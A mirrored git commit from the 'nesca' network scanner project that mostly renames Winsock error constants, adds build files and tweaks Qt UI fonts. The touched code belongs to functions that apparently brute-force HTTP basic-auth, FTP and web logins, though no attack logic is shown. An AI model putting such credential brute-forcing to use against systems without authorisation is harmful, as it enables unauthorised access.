mirror of
https://github.com/ChronosX88/nesca.git
synced 2024-11-23 02:32:22 +00:00
--
This commit is contained in:
parent
a1d45ae5d9
commit
ce9994193e
30
.gitignore
vendored
30
.gitignore
vendored
@ -1,3 +1,33 @@
|
||||
*.swo
|
||||
*.swp
|
||||
debugData.txt
|
||||
*.png
|
||||
adns_dll.dll
|
||||
changelog
|
||||
*.obj
|
||||
*.res
|
||||
*.log
|
||||
*.tlog
|
||||
*.lastbuildstate
|
||||
*.pdb
|
||||
GeneratedFiles/*
|
||||
imp.txt
|
||||
imp2.txt
|
||||
*.dll
|
||||
logs/*
|
||||
*.vcxproj.*
|
||||
*.vcxproj
|
||||
*.aps
|
||||
*.svg
|
||||
Release/*
|
||||
Debug/*
|
||||
restore
|
||||
result_files/*
|
||||
*.bmp
|
||||
*.bk
|
||||
|
||||
|
||||
tags.txt
|
||||
version
|
||||
lisca.cpp
|
||||
main - копия.cpp
|
||||
|
@ -672,9 +672,9 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
|
||||
if(cCode == SOCKET_ERROR) {
|
||||
|
||||
int errorCode = WSAGetLastError();
|
||||
if(errorCode == ENOTSOCK) {
|
||||
if(errorCode == WSAENOTSOCK) {
|
||||
|
||||
while(errorCode == ENOTSOCK)
|
||||
while(errorCode == WSAENOTSOCK)
|
||||
{
|
||||
if(gDebugMode) stt->doEmitionDebugFoundData("[BA][ENOTSOCK] - [" + QString(ip) + ":" + QString::number(port) + "]");
|
||||
CSSOCKET(sock);
|
||||
@ -686,7 +686,7 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
|
||||
|
||||
CSSOCKET(sock);
|
||||
|
||||
if(errorCode != ETIMEDOUT)
|
||||
if(errorCode != WSAETIMEDOUT)
|
||||
{
|
||||
stt->doEmitionRedFoundData("[BA] Cannot connect to " + QString(ip) + "[" + QString::number(errorCode) + "]");
|
||||
};
|
||||
@ -918,7 +918,7 @@ lopaStr _FTPBrute(char *ip, int port, PathStr *ps)
|
||||
sockFTP = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
|
||||
connectionResult = connect(sockFTP, (sockaddr*)&sockAddr, sizeof(sockAddr));
|
||||
|
||||
while(WSAGetLastError() == ENOTSOCK)
|
||||
while(WSAGetLastError() == WSAENOTSOCK)
|
||||
{
|
||||
if(gDebugMode) stt->doEmitionDebugFoundData("[FTP][ENOTSOCK] [" + QString(ip) + ":" + QString::number(port) + "]");
|
||||
CSSOCKET(sockFTP);
|
||||
@ -1249,13 +1249,13 @@ lopaStr _FTPBrute(char *ip, int port, PathStr *ps)
|
||||
{
|
||||
int WSAerr;
|
||||
if(connectionResult == -1) WSAerr = WSAGetLastError();
|
||||
else WSAerr = ETIMEDOUT;
|
||||
else WSAerr = WSAETIMEDOUT;
|
||||
|
||||
if(gThreads > 1
|
||||
&& WSAerr != ETIMEDOUT/*Timeout*/
|
||||
&& WSAerr != ENOBUFS/*POOLOVERFLOW*/
|
||||
&& WSAerr != ECONNREFUSED/*WSAECONNREFUSED*/
|
||||
&& WSAerr != ECONNRESET/*WSAECONNRESET*/
|
||||
&& WSAerr != WSAETIMEDOUT/*Timeout*/
|
||||
&& WSAerr != WSAENOBUFS/*POOLOVERFLOW*/
|
||||
&& WSAerr != WSAECONNREFUSED/*WSAECONNREFUSED*/
|
||||
&& WSAerr != WSAECONNRESET/*WSAECONNRESET*/
|
||||
&& WSAerr != 0)
|
||||
{
|
||||
stt->doEmitionRedFoundData("[FTPBrute] Cannot connect to " + QString(ip) + " " + QString(std::to_string(WSAerr).c_str()));
|
||||
@ -1524,7 +1524,7 @@ int Connector::_EstablishConnection(char *ip, int port, char *request, conSTR *C
|
||||
if(iResult == SOCKET_ERROR)
|
||||
{
|
||||
iError = WSAGetLastError();
|
||||
if(iError == EINPROGRESS)
|
||||
if (iError == WSAEWOULDBLOCK)
|
||||
{
|
||||
fd_set read_fs;
|
||||
FD_ZERO(&read_fs);
|
||||
@ -1635,11 +1635,11 @@ int Connector::_EstablishConnection(char *ip, int port, char *request, conSTR *C
|
||||
else
|
||||
{
|
||||
++offlines;
|
||||
if(iError == ENOBUFS)
|
||||
if (iError == WSAENOBUFS)
|
||||
{
|
||||
stt->doEmitionRedFoundData("[ENOBUFS] Connection pool depleted " + QString(ip) + ":" + QString::number(port));
|
||||
}
|
||||
else if(iError == EADDRNOTAVAIL)
|
||||
else if (iError == WSAEADDRNOTAVAIL)
|
||||
{
|
||||
stt->doEmitionRedFoundData("[EADDRNOTAVAIL] " + QString(ip) +
|
||||
":" + QString::number(port) +
|
||||
@ -2157,7 +2157,7 @@ int _webLoginSeq(char *request, char *login, char *pass, char *ip, int port, int
|
||||
int cCode = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr));
|
||||
int cErrCode = WSAGetLastError();
|
||||
|
||||
while(cErrCode == ENOTSOCK)
|
||||
while(cErrCode == WSAENOTSOCK)
|
||||
{
|
||||
CSSOCKET(sock);
|
||||
sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
|
||||
|
@ -55,26 +55,29 @@ typedef int BOOL;
|
||||
#ifndef SOCKET_ERROR
|
||||
#define SOCKET_ERROR (-1)
|
||||
#endif
|
||||
#ifndef EINPROGRESS
|
||||
#define EINPROGRESS WSAEINPROGRESS //10036
|
||||
#ifndef WSAEWOULDBLOCK
|
||||
#define WSAEWOULDBLOCK EWOULDBLOCK //10035
|
||||
#endif
|
||||
#ifndef ENOTSOCK
|
||||
#define ENOTSOCK WSAENOTSOCK //10038
|
||||
#ifndef WSAEINPROGRESS
|
||||
#define WSAEINPROGRESS EINPROGRESS //10036
|
||||
#endif
|
||||
#ifndef EADDRNOTAVAIL
|
||||
#define EADDRNOTAVAIL WSAEADDRNOTAVAIL //10049
|
||||
#ifndef WSAENOTSOCK
|
||||
#define WSAENOTSOCK ENOTSOCK //10038
|
||||
#endif
|
||||
#ifndef ECONNRESET
|
||||
#define ECONNRESET WSAECONNRESET //10054
|
||||
#ifndef WSAEADDRNOTAVAIL
|
||||
#define WSAEADDRNOTAVAIL EADDRNOTAVAIL //10049
|
||||
#endif
|
||||
#ifndef ENOBUFS
|
||||
#define ENOBUFS WSAENOBUFS //10055
|
||||
#ifndef WSAECONNRESET
|
||||
#define WSAECONNRESET ECONNRESET //10054
|
||||
#endif
|
||||
#ifndef ETIMEDOUT
|
||||
#define ETIMEDOUT WSAETIMEDOUT //10060
|
||||
#ifndef WSAENOBUFS
|
||||
#define WSAENOBUFS ENOBUFS //10055
|
||||
#endif
|
||||
#ifndef ECONNREFUSED
|
||||
#define ECONNREFUSED WSAECONNREFUSED //10061
|
||||
#ifndef WSAETIMEDOUT
|
||||
#define WSAETIMEDOUT ETIMEDOUT //10060
|
||||
#endif
|
||||
#ifndef WSAECONNREFUSED
|
||||
#define WSAECONNREFUSED ECONNREFUSED //10061
|
||||
#endif
|
||||
|
||||
#endif
|
||||
|
48
nesca_3.pri
Normal file
48
nesca_3.pri
Normal file
@ -0,0 +1,48 @@
|
||||
# ----------------------------------------------------
|
||||
# This file is generated by the Qt Visual Studio Add-in.
|
||||
# ------------------------------------------------------
|
||||
|
||||
# This is a reminder that you are using a generated .pro file.
|
||||
# Remove it when you are finished editing this file.
|
||||
message("You are running qmake on a generated .pro file. This may not work!")
|
||||
|
||||
|
||||
HEADERS += ./base64.h \
|
||||
./resource.h \
|
||||
./nesca_3.h \
|
||||
./ActivityDrawerTh_HorNet.h \
|
||||
./STh.h \
|
||||
./CheckKey_Th.h \
|
||||
./DrawerTh_QoSScanner.h \
|
||||
./CheckProxy_Th.h \
|
||||
./DrawerTh_HorNet.h \
|
||||
./DrawerTh_GridQoSScanner.h \
|
||||
./DrawerTh_VoiceScanner.h \
|
||||
./DrawerTh_ME2Scanner.h \
|
||||
./darkmap.h \
|
||||
./IRCPinger_Th.h \
|
||||
./oIRC_Th.h \
|
||||
./irc_nmblinker.h \
|
||||
./msgpopup.h
|
||||
SOURCES += ./ActivityDrawerTh_HorNet.cpp \
|
||||
./base64.cpp \
|
||||
./CheckKey_Th.cpp \
|
||||
./CheckProxy_Th.cpp \
|
||||
./connector.cpp \
|
||||
./darkmap.cpp \
|
||||
./DrawerTh_GridQoSScanner.cpp \
|
||||
./DrawerTh_HorNet.cpp \
|
||||
./DrawerTh_ME2Scanner.cpp \
|
||||
./DrawerTh_QoSScanner.cpp \
|
||||
./DrawerTh_VoiceScanner.cpp \
|
||||
./finder.cpp \
|
||||
./IRCPinger_Th.cpp \
|
||||
./irc_nmblinker.cpp \
|
||||
./main.cpp \
|
||||
./msgpopup.cpp \
|
||||
./nesca_3.cpp \
|
||||
./nesca_startModule.cpp \
|
||||
./oIRC_Th.cpp \
|
||||
./STh.cpp
|
||||
FORMS += ./nesca_3.ui
|
||||
RESOURCES += nesca_3.qrc
|
20
nesca_3.pro
Normal file
20
nesca_3.pro
Normal file
@ -0,0 +1,20 @@
|
||||
# ----------------------------------------------------
|
||||
# This file is generated by the Qt Visual Studio Add-in.
|
||||
# ------------------------------------------------------
|
||||
|
||||
TEMPLATE = app
|
||||
TARGET = nesca_3
|
||||
DESTDIR = ../Win32/Release
|
||||
QT += core widgets gui qml
|
||||
CONFIG += release
|
||||
DEFINES += QT_DLL QT_WIDGETS_LIB QT_QML_LIB
|
||||
INCLUDEPATH += ./GeneratedFiles \
|
||||
. \
|
||||
../../../../../../../../Qt/Qt5.0.0/5.0.0/msvc2010/bin
|
||||
DEPENDPATH += .
|
||||
MOC_DIR += C:/Qt/Qt5.0.0/5.0.0/msvc2010/bin
|
||||
OBJECTS_DIR += release
|
||||
UI_DIR += ./GeneratedFiles
|
||||
RCC_DIR += ./GeneratedFiles
|
||||
include(nesca_3.pri)
|
||||
win32:RC_FILE = nesca_3.rc
|
@ -1,5 +1,6 @@
|
||||
<RCC>
|
||||
<qresource prefix="/nesca_3">
|
||||
<file>Eurostile.ttf</file>
|
||||
</qresource>
|
||||
<qresource prefix="/nesca_3">
|
||||
<file>Eurostile.ttf</file>
|
||||
<file>nesca.ico</file>
|
||||
</qresource>
|
||||
</RCC>
|
||||
|
18
nesca_3.ui
18
nesca_3.ui
@ -1678,7 +1678,7 @@ border-radius: 3px;</string>
|
||||
<string><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
|
||||
<html><head><meta name="qrichtext" content="1" /><style type="text/css">
|
||||
p, li { white-space: pre-wrap; }
|
||||
</style></head><body style=" font-family:'Consolas'; font-size:11pt; font-weight:400; font-style:normal;">
|
||||
</style></head><body style=" font-family:'Consolas'; font-size:8.25pt; font-weight:400; font-style:normal;">
|
||||
<p style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:'MS Shell Dlg 2'; font-size:8pt;"><br /></p></body></html></string>
|
||||
</property>
|
||||
<property name="cursorWidth">
|
||||
@ -2180,8 +2180,8 @@ p, li { white-space: pre-wrap; }
|
||||
<string/>
|
||||
</property>
|
||||
<property name="icon">
|
||||
<iconset>
|
||||
<normaloff>:/nesca_3/Z:/nesca.ico</normaloff>:/nesca_3/Z:/nesca.ico</iconset>
|
||||
<iconset resource="nesca_3.qrc">
|
||||
<normaloff>:/nesca_3/nesca.ico</normaloff>:/nesca_3/nesca.ico</iconset>
|
||||
</property>
|
||||
</widget>
|
||||
<widget class="QLabel" name="WhiteLabel">
|
||||
@ -2433,7 +2433,7 @@ p, li { white-space: pre-wrap; }
|
||||
<string><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
|
||||
<html><head><meta name="qrichtext" content="1" /><style type="text/css">
|
||||
p, li { white-space: pre-wrap; }
|
||||
</style></head><body style=" font-family:'Eurostile'; font-size:11pt; font-weight:400; font-style:normal;">
|
||||
</style></head><body style=" font-family:'Eurostile'; font-size:8.25pt; font-weight:400; font-style:normal;">
|
||||
<p style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:8pt;"><br /></p></body></html></string>
|
||||
</property>
|
||||
<property name="cursorWidth">
|
||||
@ -2930,7 +2930,7 @@ background-color: #000000;</string>
|
||||
<property name="font">
|
||||
<font>
|
||||
<family>Eurostile</family>
|
||||
<pointsize>9</pointsize>
|
||||
<pointsize>8</pointsize>
|
||||
</font>
|
||||
</property>
|
||||
<property name="styleSheet">
|
||||
@ -3415,7 +3415,7 @@ background-color: #000000;</string>
|
||||
<string><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
|
||||
<html><head><meta name="qrichtext" content="1" /><style type="text/css">
|
||||
p, li { white-space: pre-wrap; }
|
||||
</style></head><body style=" font-family:'Eurostile'; font-size:11pt; font-weight:400; font-style:normal;">
|
||||
</style></head><body style=" font-family:'Eurostile'; font-size:8.25pt; font-weight:400; font-style:normal;">
|
||||
<p style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:8pt;"><br /></p></body></html></string>
|
||||
</property>
|
||||
<property name="acceptRichText">
|
||||
@ -3551,7 +3551,7 @@ p, li { white-space: pre-wrap; }
|
||||
<string><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
|
||||
<html><head><meta name="qrichtext" content="1" /><style type="text/css">
|
||||
p, li { white-space: pre-wrap; }
|
||||
</style></head><body style=" font-family:'Eurostile'; font-size:11pt; font-weight:400; font-style:normal;">
|
||||
</style></head><body style=" font-family:'Eurostile'; font-size:8.25pt; font-weight:400; font-style:normal;">
|
||||
<p style="-qt-paragraph-type:empty; margin-top:2px; margin-bottom:2px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:8pt;"><br /></p></body></html></string>
|
||||
</property>
|
||||
<property name="acceptRichText">
|
||||
@ -4012,6 +4012,8 @@ color: rgb(71, 71, 71);</string>
|
||||
<tabstop>exitButton</tabstop>
|
||||
<tabstop>dataText</tabstop>
|
||||
</tabstops>
|
||||
<resources/>
|
||||
<resources>
|
||||
<include location="nesca_3.qrc"/>
|
||||
</resources>
|
||||
<connections/>
|
||||
</ui>
|
||||
|
@ -114,7 +114,7 @@ void _blinkNLine(QString tempData = "", QString senderNick = "")
|
||||
|
||||
int sendS(int lSock, char *msg, int len, int mode)
|
||||
{
|
||||
if(lSock == ENOTSOCK || lSock <= 0 || !connectedToIRC) {
|
||||
if(lSock == WSAENOTSOCK || lSock <= 0 || !connectedToIRC) {
|
||||
ircTh->doEmitChangeRedIRCData("Not connected.");
|
||||
return -1;
|
||||
}
|
||||
|
Loading…
Reference in New Issue
Block a user